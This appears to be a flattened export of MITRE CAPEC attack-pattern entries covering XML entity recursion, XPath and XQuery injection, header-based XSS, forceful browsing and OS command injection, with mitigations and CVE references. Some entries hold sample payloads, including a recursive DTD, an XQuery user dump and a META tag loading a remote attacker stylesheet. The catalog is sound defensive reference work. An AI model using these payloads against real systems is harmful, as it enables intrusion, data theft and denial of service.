Attacker must be able to send a malicious XML payload to host, such as SOAP or REST web service.
Very High
High
Injection
Several commercial XML parsers were found to be vulnerable to XDoS through XML recursion attacks. The code fragment below is self-referencing and can result in the parser exhausting all CPU and/or memory available to it.
<!DOCTYPE evildoc [
<!ENTITY x0 hello XDoS">
<!ENTITY xevilparam &x99;&x99;"> ]>
<foobar>&xevilparam;</foobar>
By the time the service provider validates the DTD elements it is too late, because the validation routines references itself. SOAP messages are no longer allowed to accept DTDs, however there is nothing to stop developers of other applications or custom SOAP implementations from bypassing this concern.
Low
Crafting malicious XML content and injecting it through standard interfaces
Design: Utilize a Security Pipeline Interface (SPI) to mediate communications between service requester and service provider The SPI should be designed to throttle up and down and handle a variety of payloads.
Design: Utilize clustered and fail over techniques, leverage network transports to provide availability such as HTTP load balancers
Implementation: Check size of XML message before parsing
Availability
DoS: resource consumption (memory)
Denial of Service
XML-capable system interfaces
Maliciously crafted XML
XML inspection, parsing and validation routines
Denial of Service
674
Targeted
400
Targeted
770
Targeted
Exploitation
Low
Medium
High
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that he normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database. In order to successfully inject XML and retrieve information from a database, an attacker:
Determines the user-controllable input that is used without proper validation as part of XPath queries
Determines the structure of queries that accept such input
Crafts malicious content containing XPath expressions that is not validated by the application and is executed as part of the XPath queries.
XPath queries used to retrieve information stored in XML documents
User-controllable input not properly sanitized before being used as part of XPath queries
High
High
Injection
Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass.
Low
XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection
None
The attacker tries to inject characters that can cause an XPath error, such as single-quote ('), or content that may cause a malformed XPath expression. If the injection of such content into the input causes an XPath error and the resulting error is displayed unfiltered, the attacker can begin to determine the nature of input validation and structure of XPath expressions used in queries.
Too many exceptions generated by the application as a result of malformed XPath queries
Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XPath expression. Characters such as a single-quote(') or operators such as or (|), and (&) and such should be filtered if the application does not expect them in the context in which they appear. If such content cannot be filtered, it must at least be properly escaped to avoid them being interpreted as part of XPath expressions.
Use of parameterized XPath queries - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails.
Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
User-controllable input used as part of dynamic XPath queries
XPath expressions intended to defeat checks run by XPath queries
XML database
The impact of payload activation is that it is interpreted as part of the XPath expression used in the query, thus enabling an attacker to modify the expression used by the query.
91
Targeted
74
Secondary
20
Secondary
390
Secondary
713
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
250
Special characters in user-controllable input must be escaped before use by the application.
Only use parameterized XPath expressions to query the XML database.
Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database.
Reluctance to Trust
Failing Securely
Defense in Depth
Never Use Input as Part of a Directive to any Internal Component
Handle All Errors Safely
Penetration
Exploitation
High
High
Medium
Client-Server
SOA
All
All
All
Common Weakness Enumeration (CWE)
CWE-91 - XML Injection
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/91.html
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Common Weakness Enumeration (CWE)
CWE-390 - Improper Error Handling
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/390.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.
Survey the application for user-controllable inputs
Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application.
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Inputs are used by the application or the browser (DOM)
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Determine user-controllable input susceptible to injection
Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax.
Use web browser to inject input through text fields or through HTTP GET parameters.
env-Web
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
env-Web
Use XML files to inject input.
env-Web env-ClientServer env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Use network-level packet injection tools such as netcat to inject input
env-Web env-ClientServer env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Use modified client (modified by reverse engineering) to inject input.
env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives normal response from server.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives an error message from server indicating that there was a problem with the XQL query.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
At least one user-controllable input susceptible to injection found.
No user-controllable input susceptible to injection found.
Search for and alert on unexpected XQL keywords in application logs.
Input validation of user-controlled data before including it in an XQL query
Information Disclosure
The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information.
Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it.
env-Web
The attacker gets information from the XML database.
Monitor server logs for suspicious XQuery requests.
Use appropriate input validation to filter XQL syntax in user-controllable inputs.
Do not use user-controllable input as part of XQL queries.
Manipulate the data in the XML database
The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data.
Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database.
env-Web
The attacker gets the XQuery engine to insert or modify data in the database. This is mainly used to either insert wrong data or to insert persistent attack payloads (XSS for instance) that will be sent to other users' browser.
Monitor server logs for consecutive suspicious request to the XML database.
Use appropriate input validation to filter XQL syntax in user-controllable inputs.
Do not use user-controllable input as part of XQL queries.
The XQL must execute unvalidated data
Very High
High
Injection
An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.
doc(accounts.xml)//user[Name='*']
The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL.
Low
Basic understanding of XQuery
Design: Perform input white list validation on all XML input
Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL.
Integrity
Modify application data
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
XML-capable system interfaces
XQuery syntax
XQL commands
74
Targeted
713
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
250
Penetration
Exploitation
High
High
High
Client-Server
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. In many XSS attacks the attacker must get a "hole in one" and successfully exploit the vulnerability on the victim side the first time, once the client is redirected the attacker has many chances to engage in follow on probes, but there is only one first chance. In a widely used web application this is not a major problem because 1 in a 1,000 is good enough in a widely used application.
A common first step for an attacker is to footprint the environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on.
The user must allow JavaScript to execute in their browser
Very High
High
Protocol Manipulation
Injection
Brute Force
Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. By appending a malicious script to an otherwise normal looking URL, the attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute additional javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks).
Medium
To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript
Design: Use browser technologies that do not allow client side scripting.
Design: Utilize strict type, character, and encoding enforcement
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Perform input validation for all remote content.
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.
Confidentiality
Read application data
Payload delivered through standard communication protocols, such as Ajax application.
Command(s) executed directly on host
Client machine and client network
Enables attacker to execute probes against client system.
79
Targeted
113
Targeted
348
Targeted
96
Targeted
20
Targeted
116
Targeted
184
Secondary
86
Secondary
712
Targeted
692
Targeted
1000
Attack Pattern
ChildOf
541
Reconnaissance
High
Low
Low
Client-Server
SOA
All
All
AJAX
Shreeraj Shah
Ajax fingerprinting for Web 2.0 Applications
Help Net Security
http://www.net-security.org/dl/articles/Ajax_fingerprinting.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.
Spider
Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.)
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers.
env-Web
Look for HTML meta tags that could be injectable
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Web content is generated by the application and served to the browser based on user-controllable inputs.
env-Web
HTTP header variables are used by the application or the browser (DOM)
env-Web
No HTTP variables appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding HTTP variables is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Probe identified potential entry points for XSS vulnerability
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. He records all the responses from the server that include unmodified versions of his script.
The attacker tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response.
Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
env-Web
Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
env-Web
Use a proxy tool to record results of manual input of XSS probes in known URLs.
env-Web
User-controllable input is embedded as part of generated HTTP headers
env-Web
Input parameters become part of the web page (even in meta tags)
env-Web
Output to the browser is not encoded to remove executable scripting syntax.
env-Web
Nothing is returned to the web page. It may be a stored XSS. The unique identifier from the probe helps to trace the flow of the possible XSS.
env-Web
The attacker's cross-site scripting string is repeated back verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, script, etc.)
All HTML-sensitive characters are consistently re-encoded before being sent to the web browser.
Some sensitive characters are consistently encoded, but others are not.
Monitor input to web servers (not only GET, but all in the inputs), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Do not embed user-controllable input generated HTTP headers
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Steal session IDs, credentials, page content, etc.
As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker.
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately.
env-Web
The attacker gets the user's cookies or other session identifiers.
The attacker gets the content of the page the user is viewing.
The attacker causes the user's browser to visit a page with malicious content.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Forceful browsing
When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not).
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site
env-Web
Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities).
env-Web
The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF.
The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of.
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Content spoofing
By manipulating the content, the attacker targets the information that the user would like to get from the website.
Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page.
env-Web
The user sees a page containing wrong information
Monitor server logs for scripting parameters.
Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate.
Apply appropriate input validation to filter all user-controllable input of scripting syntax
Appropriately encode all browser output to avoid scripting syntax
Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes.
Target software must be a client that allows scripting communication from remote hosts, and attacker must control a remote site of some sort to redirect client and data to.
Very High
High
Injection
Modification of Resources
Protocol Manipulation
Utilize a remote style sheet set in the HTTP header for XSS attack. When the attacker is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote attacker. Like most XSS attacks, results vary depending on browser that is used.
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
[R.86.2]
Google's 404 redirection script was found vulnerable to this attack vector.
Google's 404 file not found page read
* Response headers: "Content-Type: text/html; charset=[encoding]".
* Response body: <META http-equiv="Content-Type" (...) charset=[encoding]/>
If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [R.86.3]
XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the attacker can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host.
Low
To achieve a redirection and use of less trusted source, an attacker can simply edit HTTP Headers that are sent to client machine.
High
Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.
Ability to deploy a custom hostile service for access by targeted clients. Ability to communicate synchronously or asynchronously with client machine
Design: Use browser technologies that do not allow client side scripting.
Design: Utilize strict type, character, and encoding enforcement
Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from.
Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.
Implementation: Perform input validation for all remote content.
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in browser
Implementation: Session tokens for specific host
Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Malicious input delivered through HTTP Headers.
Varies with instantiation of attack pattern. In the case of HTTP headers they may not be visible to the end user via a browser
Header processing on the server or Client browser
Enables attacker to execute scripts to launch attacks on server as well as remote client machine and environment
79
Targeted
184
Secondary
348
Targeted
96
Targeted
20
Targeted
116
Targeted
86
Secondary
692
Targeted
697
Targeted
713
Targeted
71
Targeted
CVE-2006-5442
ViewVC 1.0.2 and earlier does not specify a charset in its HTTP headers or HTML documents, which allows remote attackers to conduct cross-site scripting (XSS) attacks that inject arbitrary UTF-7 encoded JavaScript code via a view.
CVE-2006-3918
http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
1000
Attack Pattern
ChildOf
18
1000
Attack Pattern
ChildOf
220
Penetration
Exploitation
High
High
High
Client-Server
SOA
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
OWASP Cheatsheets
XSS Filter Evasion Cheat Sheet
The Open Web Application Security Project (OWASP)
http://ha.ckers.org/xss.html
Watchfire Research
XSS vulnerabilities in Google.com
Full Disclosure mailing list archives
Dec 21 2005
http://seclists.org/fulldisclosure/2005/Dec/1107
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker employs forceful browsing to access portions of a website that are otherwise unreachable through direct URL entry.
Usually, a front controller or similar design pattern is employed to protect access to portions of a web application.
Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.
Spider
Using an automated tool, an attacker follows all public links on a web site. He records all the links he finds.
Use a spidering tool to follow and record all links
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application.
env-Web
A list of links is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Attempt well-known or guessable resource locations
Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. He records all the positive responses from the server.
Use a spidering tool to follow and record attempts on well-known URLs
env-Web
Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.
env-Web
Common resource identifiers are used (e.g., /admin/, admin.jsp, admin.aspx, etc.)
env-Web
Well-known middleware or application platforms are used (e.g., Cold Fusion, WebSphere, WebLogic, JBoss, etc.)
env-Web
The attacker discovers one or more unprotected resources.
Monitor errors (e.g., 404 not found) from web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on an unusual number of consecutive failures or total failures from a single host. Potentially alert on many failures from many different hosts, but in a relatively short time window.
Create "honeypot" web pages or scripts that do not actually have any use in the application, and name them common names (e.g., admin.jsp, admin.do, admin.aspx, etc.). Alert when one of these resources is requested.
Actively monitor the application and either deny or redirect requests from origins that appear to be generating an unusual amount of failures.
Obtain a list of sensitive areas that should not be directly accessible (e.g., JSPs or other templates that should only be accessible via front controllers). Apply an external mechanism (rule in the load balancer, rule in the reverse proxy, etc.) to intercept and redirect requests for those resources. Ideally use patterns, not specific page names (e.g., /jsp/* instead of a list of individual JSPs). Regularly update the list that is used in operation.
Identify defaults for platform-specific sensitive resources. If the application does not use those defaults, alert on all requests for them (e.g., http://server:8080/admin/)
Use unauthorized resources
By visiting the unprotected resource, the attacker makes use of unauthorized functionality.
Access unprotected functions and execute them.
env-All
Malformed log entries are a common side-effect of this kind of attack. E.g., "User xyz deleted by on 10/16/07." The "by on" indicates that no authorized user was recorded. (A good entry would say "user xyz deleted by admin on 10/16/07"). Monitoring of log file entries for correct and consistent output format can indicate this kind of attack succeeding.
View unauthorized data
The attacker discovers and views unprotected sensitive data.
Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
env-Web
Dynamic pages (JSP, ASP, PHP, etc.) exist that divulge sensitive data without first checking authorization.
env-Web
The forcibly browseable pages or accessible resources must be discoverable and improperly protected.
High
Very High
A number of automated crawlers as well as other tools are available that generally perform a good job at looking for forcefully browseable pages
Brute Force
A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.
An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate himself in that role.
Low
Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult
A directory listing is helpful but not a requirement. No special resources are required.
Following all the links recursively reveals resources that are available
Having a directory listing also points to the available pages and resources in the application that may be forcibly browseable.
Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.
Forceful browsing can also be made difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.
Confidentiality
Read files or directories
Confidentiality
Access_Control
Authorization
Bypass protection mechanism
425
Targeted
285
Secondary
693
Targeted
CVE-2007-1156
JBrowser allows remote attackers to bypass authentication and access certain administrative capabilities via a direct request for _admin/.
CVE-2007-1062
The Cisco Unified IP Conference Station 7935 3.2(15) and earlier, and Station 7936 3.3(12) and earlier does not properly handle administrator HTTP sessions, which allows remote attackers to bypass authentication controls via a direct URL request to the administrative HTTP interface for a limited time
1000
Category
ChildOf
210
333
Category
HasMember
367
Complete Mediation
Reluctance To Trust
Treat the Entire Inherited Process Context as Unvalidated Input
Use Authentication Mechanisms, Where Appropriate, Correctly
CAPEC Content Team
The MITRE Corporation
2014-06-23
In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.
Identify inputs for OS commands
The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.
Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
env-Local env-CommProtocol env-Peer2Peer env-ClientServer
TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, he attempts to guess the actual operating system.
env-Embedded env-ClientServer env-Peer2Peer env-CommProtocol env-Web
Induce errors to find informative error messages
env-All
The target software accepts connections via the network.
env-Web env-CommProtocol env-Peer2Peer env-Embedded env-ClientServer
Operating environment (operating system, language, and/or middleware) is correctly identified.
Multiple candidate operating environments are suggested.
Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems).
Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software.
Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection.
Survey the Application
The attacker surveys the target application, possibly as a valid and authenticated user
Spidering web sites for all available links
env-Web
Inventory all application inputs
env-All
Attacker develops a list of valid inputs
env-All
The attacker develops a list of likely command delimiters.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Vary inputs, looking for malicious results.
Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input, containing OS commands, to be passed to the application
Inject command delimiters using network packet injection tools (netcat, nemesis, etc.)
env-CommProtocol env-Web env-Peer2Peer env-ClientServer
Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.)
env-Web
Inventorying in prior step is successful.
env-All
One or more injections that are appropriate to the platform provokes an unexpected response from the software, which can be varied by the attacker based on the input.
Execute malicious commands
The attacker may steal information, install a back door access mechanism, elevate privileges or compromise the system in some other way.
The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection).
env-All
The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection).
env-All
The attacker executes a command that stores sensitive information into a location where he can retrieve it later (perhaps using a different command injection).
env-All
The software performs an action the attacker desires. This might be displaying information, storing a program, executing a command, or some other malicious activity.
Make commonly exploited administrative tools log their execution.
Make commonly exploited administrative tools non-executable, except when the system is in specific maintenance periods. (i.e., require administrators to specifically enable certain administrative commands prior to performing system maintenance.)
User controllable input used as part of commands to the underlying operating system.
High
High
There is high motivation for the attacker to seek out and discover opportunities for this attack due to the power it yields.
Injection
API Abuse
A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.
An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.
A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system.
The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line.
This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4).
High
The attacker needs to have knowledge of not only the application to exploit but also the exact nature of commands that pertain to the target operating system. This may involve, though not always, knowledge of specific assembly commands for the platform.
Use language APIs rather than relying on passing data to the operating system shell or command line. Doing so ensures that the available protection mechanisms in the language are intact and applicable.
Filter all incoming data to escape or remove characters or strings that can be potentially misinterpreted as operating system or shell commands
All application processes should be run with the minimal privileges required. Also, processes must shed privileges as soon as they no longer require them.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Bypass protection mechanism
Confidentiality
Read application data
User-controllable input used as part of operating system commands
Operating system commands injected by the attacker, intended to escalate privilege or divulge information
Underlying operating system hosting the exploited application.
The injected OS commands are interpreted by the shell, causing them to be executed under the privileges of the process running the exploited application.
78
Targeted
88
Secondary
20
Secondary
697
Targeted
713
Targeted
1000
Attack Pattern
ChildOf
248
Least Privilege
Reluctance To Trust
Never Use Unvalidated Input as Part of a Directive to any Internal Component
Penetration
Exploitation
High
High
High
All
All
All
All
Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection
Secunia Advisories
Secunia
September 20, 2005
http://secunia.com/advisories/16869/
CAPEC Content Team
The MITRE Corporation
2014-06-23
A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to his site rather than the originally intended one.
Pharming does not require script injection or clicking on malicious links for the attack to succeed.
Attacker sets up a system mocking the one trusted by the users. This is usually a website that requires or handles sensitive information.
